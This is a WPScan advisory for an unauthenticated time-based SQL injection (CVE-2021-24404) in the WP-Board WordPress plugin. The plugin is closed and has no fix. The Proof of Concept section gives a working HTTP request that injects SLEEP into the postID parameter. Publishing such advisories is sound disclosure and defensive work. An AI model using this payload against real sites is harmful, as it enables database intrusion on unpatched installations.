WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP-Board <= 1.1 (beta) - Unauthenticated SQL Injection

Description

The options.php file of the plugin accepts a postid parameter which is not sanitised, escaped or validated before inserting to a SQL statement, leading to SQL injection. This is a time based SQLI and in the same function vulnerable parameter is passed twice so if we pass time as 5 seconds it takes 10 seconds to return since the query ran twice.

Proof of Concept

POST /wp-content/plugins/wp-board/php/actions.php?action=modp&postID=0%20AND%20(SELECT%201067%20FROM (SELECT(SLEEP(5)))PVan) HTTP/1.1
Content-Length: 19
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

newtext=sad&imp=off

Affects Plugins

wp-board
No known fix - plugin closed

References

CVE
CVE-2021-24404
URL
https://codevigilant.com/disclosure/2021/wp-plugin-wp-board/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Syed Sheeraz Ali of Codevigilant

Verified

Yes

WPVDB ID
a86240e1-f064-4972-9f97-6b349fdd57f6

Timeline

Publicly Published

2021-08-22 (about 9 months ago)

Added

2021-08-23 (about 9 months ago)

Last Updated

2022-03-07 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin